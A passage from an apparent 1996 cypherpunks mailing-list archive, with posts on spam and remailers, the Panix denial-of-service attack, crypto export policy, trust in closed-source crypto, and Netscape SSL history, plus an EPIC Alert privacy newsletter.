06:58:09 +0800 Subject: mailing lists In-Reply-To: <323850BF.B46@precipice.v-site.net> Message-ID: <3238648F.207@precipice.v-site.net> >i don't see you sticking your neck out to deal with assholes who think >freedom of speech is secondary to their right not to ever see mail >they don't want. Like hell we're not. What are you guys mad at us for? Thinking that FREEDOM of SPEECH is much, much more important that whining computer nerds who can't push a DELETE button. >i did competitive public speaking from 7th grade until my junior year >of high school where i was also on the debate team for two years. In that case, maybe you should learn to use the SHIFT key. Or didn't debaters in your school take typing and/or learn about punctuation, capitalization, and the other niceties of English communication? >now i make a living as a biochemistry grad student (only a year left >until you get to call me Dr.) where logic is paramount and feelings >are irrelevant. Well, "doctor" why can't you see (with your logic) that junk Email (or "spam") would save many, many forests if it REPLACED junk SnailMail. Isn't it just that your "irrelevant feelings" have been hurt, because someone used your remailer-baby in a way you hadn't planned for ?!? Why not put your money where your mouth is, and bet me (any amount), that spam WILL be socially acceptable by the year 2000. Particularly, when the green-folks discover how many trees will be saved. It'll be a social-mandate, NOT just a suggestion. Want to bet? -- HTTP://www.HIPCRIME.com From rah at shipwright.com Thu Sep 12 16:04:26 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 13 Sep 1996 07:04:26 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW Message-ID: I think someone should just stand right up and accuse the NSA, at the behest of the Whitehouse, of running a denial of service attack on Panix at *exactly* the time when VTW is lobbying its hardest on the PRO-CODE bill. Ooops. I just did.... ;-) None *dare* call it conspiracy, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From perry at piermont.com Thu Sep 12 16:12:29 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 13 Sep 1996 07:12:29 +0800 Subject: Panix attack In-Reply-To: Message-ID: <199609122021.QAA07296@jekyll.piermont.com> Simon Spero writes: > This ensures that there's at least a traceable return address for the > connection. Sort of like photuris cookies but without the forced RTT delay Not really. The genius of the Photuris cookie is that it induces no state at all in the responder, thanks to crypto tricks. I agree, though, that you can harden hosts against TCP floods. Perry From dlv at bwalk.dm.com Thu Sep 12 16:19:38 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 13 Sep 1996 07:19:38 +0800 Subject: Kook Of The Month In-Reply-To: <199609121549.RAA06613@spoof.bart.nl> Message-ID: >From remailer at mailhub.bart.nl Thu Sep 12 11:48:50 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Thu, 12 Sep 96 13:14:35 EDT for dlv Received: from [194.158.160.11] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA27439 for dlv at bwalk.dm.com; Thu, 12 Sep 96 11:48:50 -0400 Received: (from remailer at localhost) by spoof.bart.nl (8.7.5/8.6.8) id RAA06613 for dlv at bwalk.dm.com; Thu, 12 Sep 1996 17:49:57 +0200 (MET DST) Date: Thu, 12 Sep 1996 17:49:57 +0200 (MET DST) Message-Id: <199609121549.RAA06613 at spoof.bart.nl> To: dlv at bwalk.dm.com From: remailer at 2005.bart.nl (Anonymous) Comments: Please report misuse of this automated remailing service to The contents of this message are neither approved or condoned by nl.com or our host bART Internet. *** Replying to it will not send your reply to the sender *** There is no way to determine the originator of this message. If you wish to be blocked from receiving all anonymous mail, send your request to the mailing list. The operator of this particular remailer can be reached at Subject: Kook Of The Month Eat this Dr. Scum Bag Return-Path: To: stewarts at ix.netcom.com Cc: postmaster at netcom.com, abuse at netcom.com, security at netcom.com Subject: Unsolicited harrassing e-mail from From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 11 Sep 96 21:37:09 EDT Sender: owner-cypherpunks at toad.com Please stop e-mailing me, cc:ing me, or otherwise harrassing me. I have no connection with the thread you're quoting and don't want to receive any more e-mail from you. stewarts at ix.netcom.com writes: > >> There > >> are a number of anonymous remailers out in cyberspace, but it has been > >> stated by a knowledgeable source that a number of them are being operated > >> by law enforcement agencies (presumably to troll for criminal activity). A > > > >Can someone verify/discredit/comment on this statement? Who is the > >knowledgeable source? > > Definitely true. Zero is a number, and there are also larger numbers. > KOTM = Kook Of The Month. > > # Thanks; Bill > # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com > # > # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto > From rah at shipwright.com Thu Sep 12 16:22:30 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 13 Sep 1996 07:22:30 +0800 Subject: Sen. Burns' statement on postponement of Crypto vote today. Message-ID: --- begin forwarded text Date: Thu, 12 Sep 1996 15:30:19 -0400 To: 1e$pam From: Robert Hettinga Subject: Re: Sen. Burns' statement on postponement of Crypto vote today. Cc: Bcc: X-Attachments: --- begin forwarded text From: somebody Date: Thu, 12 Sep 1996 15:03:21 -0400 To: rah at shipwright.com Subject: Re: Sen. Burns' statement on postponement of Crypto vote today. Robert-- My sources indicate that no markup will be held on the Burns bill before Congress adjourns for year. Not clear the votes were there, plus the Administration had Dems lined up to offer weakening amendments. Also, the hearing scheduled yesterday in House Judiciary for its counterpart bill was postponed until Sept. 25; that is 3 days prior to adjournment target, and I wouldn't be surprised if it never takes place. In other words, most likely prospect is for no action -- not even favorable reporting by a Cmte. -- before Congress goes home. Administration in next two weeks will unveil its "new and improved" encryption policy, which will likely offer a shift in licensing to Commerce Dept., and gradual easing of exportable strength, in exchange for industry-funded key escrow management demo projects. And that's the way it is (Political reality is not optional). You can pass this info. along, as long as you do not attribute it to me. --- end forwarded text --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From frissell at panix.com Thu Sep 12 16:46:29 1996 From: frissell at panix.com (Duncan Frissell) Date: Fri, 13 Sep 1996 07:46:29 +0800 Subject: Informal Renegotiation of the Law Message-ID: <2.2.32.19960912204730.006977ac@panix.com> Many people on this list and in the larger world focus on laws and regulations and sometimes act as if that is the only way that the relative rights and duties of governments and civilians are established. In fact, there is a lot of informal negotiation going on all the time. This is significant because an unenforced law isn't a law at all. For example, you will not read anywhere that compulsory education laws have been repealed -- but they have. When the home schooling movement started in the late 1970s, there were occasional harassment and prosecution of parents. The home schoolers won some and lost some. As time went on, the authorities came to accept home schoolers so that at this point, legal problems are rare. Compulsory education has been effectively repealed by the actions of refusenicks in both the subject population and the enforcement population. This same process will occur more frequently in the future as libertarian memes spread, government enforcement resources shrink, and people's vastly different attitudes as to what should be legal and illegal make a monopoly legal regime impossible to keep in place. Note that unlicensed immigration is against the law. Note that some websites post material that others would like banned. Maybe you can deport a few or ban a few. But how many? If you have three million illegal aliens or 3 million individual ISPs (people with high speed connections running their own sites) you can't deport them or shut them down because it simply takes too much time and too many enforcement resources. The authorities give up. You get de facto open immigration and a de facto unregulated Net. Coercion is expensive and slow. Free exchange is cheap and fast. That's why free exchange wins in the long run. It's not a victory without losses. Some people are busted. Some sites are shut down. You don't go into battle expecting zero casualties. But what counts in the end is who wins. And we've got them outnumbered by far. DCF "So you think you can handle 3 million sites? Wait a few years and you can try to handle 300 million." From joelm at eskimo.com Thu Sep 12 16:48:34 1996 From: joelm at eskimo.com (Joel McNamara) Date: Fri, 13 Sep 1996 07:48:34 +0800 Subject: CryptLib CAPI for VB Message-ID: <3.0b11.32.19960912140334.0069ea08@mail.eskimo.com> A non-text attachment was scrubbed... Name: not available Type: text/enriched Size: 340 bytes Desc: not available URL: From adam at homeport.org Thu Sep 12 17:00:52 1996 From: adam at homeport.org (Adam Shostack) Date: Fri, 13 Sep 1996 08:00:52 +0800 Subject: ISODE Consortium X.509 Certification system In-Reply-To: <3.0b11.32.19960912105914.0054f7b0@cybercash.com> Message-ID: <199609122208.RAA06798@homeport.org> Don't forget there are security vulnerabilities in X.509v3. Ross Anderson's 'Robustness Principles' paper discusses the weakness of sign after encrypting. In the Crypto '95 proceedings, or on his web site. Adam Carl Ellison wrote: | It really bothers me whenever I see someone mouthing plattitudes | about certificates, like: | | >The ITU-T, through X.509, recommend strong authentication based on public | >key cryptosystems as the basis for providing secure services. The ISODE | >Consortium uses X.509 as the core of its security strategy. | >X.509 provides a flexible, scaleable and manageable algorithm-independent | >authentication infrastructure, which can be used as the basis for a wide | >range of security services such as message encryption and access control. | | Fact is, identity certification (which is what X.509 gives) is neither | necessary nor sufficient for providing secure services -- and there's | nothing magic about X.509. | | There are marketeers, however, who want the world to believe that the | generation and use of X.509 certs will somehow give you security -- so they | can sell machinery or a service which makes those certs. | | - Carl | | P.S. My USENIX paper giving the case against certification authorities is | on-line now at = | | | +------------------------------------------------------------------+ | |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | | | PGP 2.6.2: 61 E2 DE 7F CB 9D 79 84 E9 C8 04 8B A6 32 21 A2 | | +-Officer, officer, arrest that man. He's whistling a dirty song.--+ | -- "It is seldom that liberty of any kind is lost all at once." -Hume From isptv at access.digex.net Thu Sep 12 17:16:20 1996 From: isptv at access.digex.net (ISP-TV Main Contact) Date: Fri, 13 Sep 1996 08:16:20 +0800 Subject: ISP-TV Interview with Solveig Bernstein Message-ID: <199609122145.RAA12899@access1.digex.net> *** ISP-TV Program Announcement: Interview with Solveig Bernstein *** Monday, September 16 9:00 PM ET Solveig Bernstein Assistant Director of Telecommunications & Technology Studies Cato Institute ISP-TV will present an interview with Solveig Bernstein from the Cato Institute. Ms. Bernstein will be discussing legal issues concerning the CDA, the upcoming Supreme Court case, and other telecom legal issues. This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html See URL http://www.digex.net/isptv for more information about the ISP-TV Network From hallam at ai.mit.edu Thu Sep 12 17:24:10 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Fri, 13 Sep 1996 08:24:10 +0800 Subject: What is best policy paper on crypto? In-Reply-To: <519dom$op5@life.ai.mit.edu> Message-ID: <323889B7.6956@ai.mit.edu> Adam Shostack wrote: > > Declan McCullagh wrote: > | I happen to know that an influential Congresspern will be meeting with > | some Cato folks tomorrow morning, so I'm assuming this isn't an idle > | request. > The NAS report, despite a few silly points, does push for > liberalization of the export regime, standardization, a switch to > an 'assume export' stance, states that the debate can be carried out > in public, and that classified information is not needed, and suggests > that crypto can help reduce many threats to Americans. > > It does not suggest abolishing the ITARs, and suggests > consideration of a law criminalizing the criminal use of crypto. I agree that the NAS report is the one to use. Its from an authoratative source and the conclusions are pretty reasonable. Its perhaps not as far as some would like to go but if we got there it would be livable. Given where we are it would make a good first step. Some good lines from the talk included: Re Dennings "If you know what I know argument", basically Lin said that he did know and it made no difference at all to his point of view. Also 13 of the 16 members of the committee got "the briefing" - which is all Dorothy bless her socks got, and the report was unanimous. Re who is behind the anti crypto policy, its Freeh at the FBI and not the NSA. The NSA know crypto and don't really care all that much. Gore credited as guy who is holding Freeh back. Seemed a reasonable enough guy, but a number in the audience were upset that they didn't have someone like Dorothy who we can throw tomatoes at. Phill From frantz at netcom.com Thu Sep 12 18:05:43 1996 From: frantz at netcom.com (Bill Frantz) Date: Fri, 13 Sep 1996 09:05:43 +0800 Subject: Gaining trust in OCO crypto code Message-ID: <199609122203.PAA25166@netcom8.netcom.com> These thoughts came up at the Mac Crypto conference, but are somewhat more general than the Macintosh, so I am ccing them to cypherpunks. OCO, or Object Code Only, a bad idea whose time has not yet past (although it was part of the reason for the decline of IBM's mainframe operating systems), is the business practice of keeping the source code for a system secret. Some companies are applying the idea to cryptographic software, so the we should think about how we can establish trust in such software. There are three techniques which may work for all OCO software. (1) Trust the designer/implementor. Ron Rivest's RC2 and RC4 algorithms were originally released as OCO algorithms. Rivest's reputation as a cryptographer established trust in them. (2) Trust a third party auditing agency. The US military trusts vendor implementations of cryptographic software because they have been audited by the NSA. (3) Reverse engineer the implementation. While laborious, this process is straight forward. When Netscape started using RC4 in their SSL implementation, a review of its security became important enough that a certain anonymous person(s) reverse engineered the implementation and posted it to the Internet. As a result, the algorithm has undergone peer review. If we can't use the above techniques, we have to think very carefully about what parts of a cryptographic system we can trust by only examining their inputs and outputs. Here is a list of things we can NOT trust in this manner: (1) Random number generation. An error (as occurred in a Netscape implementation), or a deliberate weakness can not be easily detected by examining only the output of a cryptographic random number generator. (2) Key generation. There are published ways to encode an RSA secret key in the corresponding RSA public key. A key generation algorithm which only uses 32 bits of the random number would be hard to detect, but easy to break by one who knew its secret. You have to be able to examine in detail how keys are generated. Now there are some things we might be able to trust based only on an examination of the inputs and outputs. (1) Implementation of a cryptographic algorithm. If we can feed it enough test cases, and compare the output with a public, well vetted implementation, we can come to believe that it is correct. (2) Certain cryptographic protocols. If we can trust one side of a Diffie-Hellman (DH) key exchange, then we can trust the keys generated because both sides contribute to the randomness of those keys. However we can't trust two instances of an OCO DH exchange implementation working with each other, so this trust doesn't seem to cover many practical instances. If the OCO protocol implementation can interoperate with a trusted implementation, then we can start to have some trust in it. However, we will still have to carefully examine the protocol for covert channels. This form of trust may be of real-world use. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From robert at precipice.v-site.net Thu Sep 12 18:07:42 1996 From: robert at precipice.v-site.net (HipCrime) Date: Fri, 13 Sep 1996 09:07:42 +0800 Subject: common sense Message-ID: <323896EE.3BC3@precipice.v-site.net> > And rather than "dispensing drugs in clinics," why not simply > scrap the drug laws entirely? People have a *right* to do as > they please with their bodies. Let's hear it for common sense. It's the first decent posting I've seen to this list. -- HTTP://www.HIPCRIME.com From hallam at ai.mit.edu Thu Sep 12 18:07:44 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Fri, 13 Sep 1996 09:07:44 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <517brn$lu7@life.ai.mit.edu> Message-ID: <3238962F.1372@ai.mit.edu> Some comments:- 1) Netscape were using BSafe but Kipp unhooked the ergodicity testing code which is meant to detect inadequate random number generation methods. Netscape got full access to Bsafe in return for 1% of Netscape stock. 2) Most serious concern was not the 40bit part. That was simply the US govt making the security a joke and there was nothing that Kipp or anyone else could do about it. More serious were the structural problems, SSL cannot be used across a firewall (unless the admin is a twit) because it is entirely opaque. SSL is not very good as an authentication only option. There is no facility for escrow of keys - another essential feature if you are to use it inside a corporation. If I am the CIO of IBM I'm not having the company secrets go out the door via some encrypted stream I can't read. Similarly banks and nuclear power stations have a legit need to snoop on their own lans. 3) Microsoft proposed PCT because they wanted to force Netscape to make SSL an open standard rather than one Netscape could tweak as they liked and freeze Microsoft out of the picture. Quite how they would imagine that anyone would want to ever do such a thing... 4) The initial weakness exposed in SSL was that integrity attacks had not been considered at all. It took a while to explain that this was in fact a more pressing concern than confidentiality in many applications. The SSL.v2 integrity was not actually bound to a particular site. Simon Spero produced a rather nice proxy server which allowed one to reroute URLs but keep the key intact. (ie connect to foobar.com and get the netscape home page). There was a long list of security holes in SSL, PCT plugged a good number of them and SSL v3 plugged a few. The overall design never gave me confidence however. Like much Netscape stuff they start with an over-simple view of the problem spec and then try to solve problems by adding extra ornaments. Phill From wombat at mcfeely.bsfs.org Thu Sep 12 18:10:31 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 13 Sep 1996 09:10:31 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <199609121640.KAA19040@rintintin.Colorado.EDU> Message-ID: > > These people have invited the email, and the associated expense, by placing > a public email-to: button on their public www page. Most people put up an "email to:" button on a public page for communications related to what's on the page. It's quite a stretch to assume that this invites any and all email from anyone who cares to send whatever they want. I can't say I've ever seen one that said "Please send SPAM(tm) to:" ... However, since others may think like you, I guess I'll have to add a line above my link stating that email not related to the purpose of my site will be happily proof-read at the rate of $200 per hour, 1 hour per 60 lines, minimum. Perhaps I'll get lucky. If I get a big enough chunk of SPAM(tm), it might be worth the costs of breaking down the anonymity. Until know, I'd never really figured out what causes lawyers. :) > A more acurate analogy, > and to the point, would be if a business sends you a postage pre-paid > business reply card, that is blank, and invites your comments on the card. > They can hardly complain of the expense when people actually send it in, > even if they don't like the comments. No, this b.s. is more like having someone put a dead skunk in my mailbox, with no return address, trying to prevent me from sending them 100 dead skunks as a return favor. And about as welcome. - r.w. From hallam at ai.mit.edu Thu Sep 12 18:37:16 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Fri, 13 Sep 1996 09:37:16 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <5181bh$614@life.ai.mit.edu> Message-ID: <3238987B.500F@ai.mit.edu> watson at tds.com wrote: > > NetSurfer said: If you know a valid email address on the spammers system you can always > bounce each message back to them. If enough people turned the messages > back on them it might give them the opportunity to experience first hand > what its like to receive tons of mail you don't want or need... > > Doesn't seem to work that well. The "green card lawyers" were reported > to have received hate-mail in the hundreds of thousands. The happily waded > through it all and pulled out a few valid replies who apparently made it > all a net profit for them, apparently. What we really need is to improve > our defensive filtering mechanisms. Someday soon we'll all have our own > personal software agents that will handle all this stuff for us. Balls, the green card lawyers minions ratted on them. The number of responses from interested people was small and the amount of business they obtained even smaller. The cost of going through all the mail, getting new net hosts and such left them with a net loss which is why they are no longer in business. Phill From banisar at epic.org Thu Sep 12 18:41:47 1996 From: banisar at epic.org (Dave Banisar) Date: Fri, 13 Sep 1996 09:41:47 +0800 Subject: EPIC Alert 3.16 Message-ID: ============================================================= @@@@ @@@@ @@@ @@@@ @ @ @@@@ @@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @@@@@ @ @@@ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @@@ @@@@ @ @ @@@@ @@@@ @ @ @ ============================================================== Volume 3.16 September 12, 1996 -------------------------------------------------------------- Published by the Electronic Privacy Information Center (EPIC) Washington, D.C. http://www.epic.org/ ======================================================================= Table of Contents ======================================================================= [1] White House Proposes Screening of all Airline Passengers [2] EPIC Testifies on Children's Privacy Bill [3] House Panel Probes White House Database [4] Crypto Update [5] Anonymous Remailer Shuts Down [6] EPIC Now Accepts First Virtual Contributions [7] EPIC/PI to Sponsor Conference on Surveillance Technologies [8] Upcoming Conferences and Events ======================================================================= [1] White House Panel Endorses Airport "Profiling" System ======================================================================= In the wake of perceived terrorist threats and the mysterious crash of TWA Flight 800 in July, a Presidential advisory panel has proposed an automated system for increased screening and "profiling" of airline passengers for all domestic and international flights. In its interim report sent to President Clinton on September 9, the White House Commission on Aviation Safety and Security provided few specifics, but noted that "[b]ased on information that is already in computer databases, passengers could be separated into a very large majority who present little or no risk, and a small minority who merit additional attention." Details of the profiling system will presumably be withheld from the public on national security grounds -- a substantial portion of the Commission's "public" meeting on September 5 was closed to permit the discussion of "classified" matters. Nonetheless, the proposed system appears to raise substantial privacy issues. The Washington Post recently reported that under the proposal, "the federal government would require creation of a computer profiling system that would examine passengers' bill-paying records, flying habits and much other data to determine which checked baggage should undergo examination by sophisticated explosives detection equipment." The Commission's initial report also calls for FBI and CIA involvement in the development of the profiling database. The theory underlying the profiling proposal appears to be that even seemingly innocuous bits of personal data can raise the suspicions of a law enforcement agency. This point is illustrated by the comments of an unidentified FBI agent recently quoted in a New York Times article. Discussing the Bureau's investigation of the bombing of Pan Am Flight 103 over Scotland, the agent noted that, "Almost everyone on the plane, almost everyone you ever met, has something that can get your imagination going. A recent fight, a divorce, a business deal, an overseas connection -- when you don't know what you're looking for, it's easy to see all kinds of possibilities." EPIC plans to monitor the development of the automated passenger profiling system under the public oversight provisions of the Federal Advisory Committee Act, which governs the proceedings of the White House Commission. More information, including relevant government documents, is available at: http://www.epic.org/privacy/faa/ ======================================================================= [2] EPIC Testifies on Children's' Privacy Bill ======================================================================= EPIC Director Marc Rotenberg testified today before the House Judiciary Committee Subcommittee on Crime in support of the Childrens Privacy Protection and Parental Empowerment Act of 1996. The bill would establish basic privacy standards for organizations that collect personal information on children and curb recent abuses in the marketing industry. The bill is sponsored by Rep. Bob Franks (R-NJ) and has 46 cosponsors in the House of Representatives. A similar measure has been introduced in the Senate by Senator Diane Feinstein (D-CA). Rotenberg said that "current practices pose a substantial threat to the privacy and safety of young people." He described a recent incident where a reporter posing as the murderer of Polly Klaas was able to obtain the ages and address of young children living in the Pasadena area. Rotenberg also cited editorials from USA Today and the Economist favoring privacy legislation as well as public opinion polls which show that 9 out of 10 Americans object to the sale of personal data where explicit consent is not obtained. Recalling the passage of the Family Educational Right to Privacy Act of 1974, which protects the privacy of student records, Rotenberg said there was already Congressional recognition of the need to protect personal information about young children. "No universities have been shut down because of the Act, but the privacy of children's educational records is more secure because Congress did not fail to act when it had the opportunity to establish privacy protection for young people." #011#Also testifying in support of the bill were Rep. Bob Franks, children rights advocate Marc Klaas, and Miriam Bell of Enough is Enough. Marc Klaas also heads the Klaas Foundation for Children which launched the Kids Off Lists campaign. Testifying against the bill were representatives from the Direct Marketing Association, a list broker, a book publisher, and a police officer from San Bernadino. More information on the Childrens Privacy bill and kids privacy may be found at: http://www.epic.org/privacy/kids/ The Klaas Foundation for Children is on the web at: http://www.klaaskids.inter.net/ ======================================================================= [3] House Panel Probes White House Database ======================================================================= The General Accounting Office revealed at a hearing of a subcommittee of the House Committee on Government Reform and Oversight on September 11 that the secret White House database of 200,000 people has inadequate controls on access. The GAO reported that the database, this existence of which, was revealed during the Filegate controversy, does not keep track of what files have been viewed by the 150 White House staffers who are authorized to access the files. The database contains 125 different fields of information for each file. Several thousand files included ethnic and political information. The GAO did not reveal in its testimony what was contained in the other fields. According to news reports, the database was designed to link into other related databases, including the Secret Service and the Democratic National Committee. The White House claims that the database is used for a number of reasons, including, for invite lists for White House events, tracking correspondence, sending out Christmas cards and other matters. Congressional Republicans claim that it is more akin to the Nixon "enemies list." The database was created by PRC Inc., a company that also creates databases for the CIA and other intelligence agencies, among other government agencies. ======================================================================= [4] Crypto Update ======================================================================= As the election approaches and Congress scrambles to complete its agenda before recessing for the year, members are continuing to deal with cryptography-related issues. The Senate Commerce Committee delayed its scheduled vote on S. 1735, the Promotion of Commerce Online in the Digital Era, originally planned for September 12. The Committee is expected to take up the measure next week. Members of the Committee have reported receiving a large number of calls supporting the bill. Individuals interested in supporting the bill should continue calling members of the Committee. The House is planning to hold hearings at the end of September to examine the companion House bill. The hearings were originally scheduled for September 11 but were delayed due to other legislative matters. The White House is also expected to introduce its own legislation next week. According to reporter Brock Meeks, the legislation will offer "sweetheart deals" to limited segments of the industry including financial, health care and insurance sectors who would then agree to support government key escrow systems. The systems would then become de facto mandatory. Internationally, an expert committee of the Organization for Economic Cooperation and Development is meeting on September 26-27 to review draft guidelines on cryptography policy. The US has been pressuring the OECD to adopt its key escrow proposals as an international standard but has been opposed by other countries and business representatives. EPIC will be hosting an international symposium in Paris on September 25, in cooperation with the OECD, to provide an opportunity for cryptographers, human rights advocates, privacy experts and user associations to present public concerns about the development of international privacy guidelines. The event will feature speakers from more than a dozen countries and includes US cryptographers Matt Blaze, Whit Diffie, and Phil Zimmermann. On September 20, oral arguments will be heard in the Daniel Bernstein's challenge to the constitutionality of export controls in federal court in San Francisco. Bernstein is arguing that the controls violate the First Amendment. Judge Marilyn Patel ruled preliminarily in May that software code is speech protected by the First Amendment More information on cryptography is available from: http://www.epic.org/crypto/ ======================================================================= [5] Anonymous Remailer Shuts Down ======================================================================= Johann Helsingius, the operator of the anon.penet.fi anonymous e-mail service has decided to shut down his remailer service because of the unknown legal protections of privacy on the Internet. He had come received requests by the Church of Scientology and the Singapore government demanding to know the identity of some of his users. In a press release, he said that he hoped to bring the server back up once the Finnish government enacted new laws protecting privacy of electronic messages, "I will close down the remailer for the time being because the legal issues governing the Internet in Finland are yet undefined. The legal protection of the users needs to be clarified. At the moment the privacy of Internet messages is judicially unclear." A list of remailers and other tools to protect privacy are available from: http://www.epic.org/privacy/tools.html ======================================================================= [6] EPIC Now Accepts First Virtual Contributions ======================================================================= Individuals interested in donating or purchasing books from EPIC can now use the First Virtual system to transfer money to EPIC. Until the end of 1996, donations of up to $50 will be matched by the Stern Foundation. Your support is appreciated and will help make possible our continued FOIA litigation, privacy advocacy, and web site development. More information about supporting EPIC is available at: http://www.epic.org/epic/donate.html ======================================================================= [7] EPIC/PI to Hold Conference on Surveillance ======================================================================= The new generation of covert surveillance activities of government agencies and private companies will be examined at a conference to be held in Ottawa next week, sponsored by EPIC and Privacy International. The conference will explore the process of planning and implementation of the technologies, their operating conditions, and the people and organizations responsible for instituting them. The conference will also examine possible technical, regulatory and legal responses. A number of former government agents, intelligence experts and surveillance analysts will gather at the Advanced Surveillance Technologies II conference on September 16th to discuss the use of powerful new technologies being used to gather information. Speakers will include Mike Frost, a former intelligence officer for the Canadian Communications Security Establishment and author of the bestseller "Spyworld." He will discuss the surveillance technologies used by the CSE and its American counterpart, the National Security Agency. The Conference will take place at the Citadel Hotel in Ottawa, Canada. More information is available on the conference from the Privacy International Web Page at: http://www.privacy.org/pi/conference/ottawa/ ======================================================================= [8] Upcoming Conferences and Events ======================================================================= "Advanced Surveillance Technologies II." September 16, 1996. Ottawa, Canada. Sponsored by EPIC and Privacy International. Contact: http://www.privacy.org/pi/conference/ottawa/ or email pi at privacy.org. "Privacy Beyond Borders", 18th International Privacy and Data Protection Conference. September 18-20, 1996. Ottawa, Canada. Sponsored by the Privacy Commissioner of Canada. Contact: jroy at fox.nstn.ca or http://infoweb.magi.com/~privcan/ "Regulation or Private Ordering? The Future of the Internet." September 20, 1996. Washington, DC. Sponsored by the CATO Institute. Contact: R. Scott Wallis, (202) 789-5296. "The Public Voice and the Development of International Cryptography Policy." September 25, 1996. Paris, France. Sponsored by EPIC. Contact: rotenberg at epic.org. "The 2nd International Conference & Exhibit on Doing Business Securely on the Information Highway." September 30 - October 1, 1996. Montreal, Quebec, Canada. Contact: http://www.ecworld.org/Conferences/2nd_Security/ menu.html. "Managing Privacy in Cyberspace and Across National Borders." October 8-10, 1996. Washington, DC. Sponsored by Privacy and American Business. Contact: Lorrie Sherwood, (201) 996-1154. "The Information Society: New Risks & Opportunities in Privacy," October 17-18, 1996. Bruxelles, Belgium. Sponsored by the European Parliament. Contact: http://www.droit.fundp.ac.be/privacy96.html "Communications Unleashed - What's at Stake? Who Benefits? How to Get Involved!" October 19-20, 1996. Washington DC. Sponsored by CPSR and Georgetown University. Contact: phyland at aol.com. "19th National Information Systems Security Conference." October 22-25, 1996. Baltimore, MD. Sponsored by NSA & NIST. Contact: Tammy Grice (301) 948-2067. "Eurosec'97, the Seventh Annual Forum on Information Systems Quality and Security." March 17-19. 1997. Paris, France. Sponsored by XP Conseil. Contact: http://ourworld.compuserve.com/homepages/eurosec/ (Send calendar submissions to alert at epic.org) ======================================================================= The EPIC Alert is a free biweekly publication of the Electronic Privacy Information Center. To subscribe, send email to epic-news at epic.org with the subject: "subscribe" (no quotes). Back issues are available via http://www.epic.org/alert/ ======================================================================= The Electronic Privacy Information Center is a public interest research center in Washington, DC. It was established in 1994 to focus public attention on emerging privacy issues such as the Clipper Chip, the Digital Telephony proposal, national id cards, medical record privacy, and the collection and sale of personal information. EPIC is sponsored by the Fund for Constitutional Government, a non-profit organization established in 1974 to protect civil liberties and constitutional rights. EPIC publishes the EPIC Alert, pursues Freedom of Information Act litigation, and conducts policy research. For more information, email info at epic.org, HTTP://www.epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. +1 202 544 9240 (tel), +1 202 547 5482 (fax). If you'd like to support the work of the Electronic Privacy Information Center, contributions are welcome and fully tax-deductible. Checks should be made out to "The Fund for Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington DC 20003. Your contributions will help support Freedom of Information Act and First Amendment litigation, strong and effective advocacy for the right of privacy and efforts to oppose government regulation of encryption and funding of the National Wiretap Plan. Thank you for your support. ---------------------- END EPIC Alert 3.16 ----------------------- From wombat at mcfeely.bsfs.org Thu Sep 12 19:03:52 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 13 Sep 1996 10:03:52 +0800 Subject: mailing lists In-Reply-To: <3238648F.207@precipice.v-site.net> Message-ID: On Thu, 12 Sep 1996, HipCrime wrote: > >i don't see you sticking your neck out to deal with assholes who think > >freedom of speech is secondary to their right not to ever see mail > >they don't want. > > Like hell we're not. What are you guys mad at us for? Thinking that > FREEDOM of SPEECH is much, much more important that whining computer > nerds who can't push a DELETE button. > Freedom of speech is a poor excuse for junk email. There are few absolute freedoms in any society, and those that exercise their "freedom" to the point of abusing their fellows are those who cause such freedoms to become more restricted. I'm personally against needing to pay the social costs of more and more laws because someone is trying to make a buck any way he can, regardless of the costs and annoyances to others. Hitting the DELETE key once in a while is not the problem. Inequitable division of the costs is a problem. The aggravation of seeing something good being slowly eroded is a problem. People who feel that they have "rights" and "freedoms" with no concept of the social responsibility that creates and protects such intangibles are a problem. > Well, "doctor" why can't you see (with your logic) that junk Email (or > "spam") would save many, many forests if it REPLACED junk SnailMail. > And how much could be saved if we did away with both? Could we end world hunger if spammers were converted to soylent green? > Isn't it just that your "irrelevant feelings" have been hurt, because > someone used your remailer-baby in a way you hadn't planned for ?!? > > Why not put your money where your mouth is, and bet me (any amount), > that spam WILL be socially acceptable by the year 2000. Particularly, > when the green-folks discover how many trees will be saved. It'll be > a social-mandate, NOT just a suggestion. Want to bet? > Telemarketing (even at at dinner time) is widespread. So is junk snail-mail. How socialy acceptable these behaviors are is debatable. Junk faxing was a 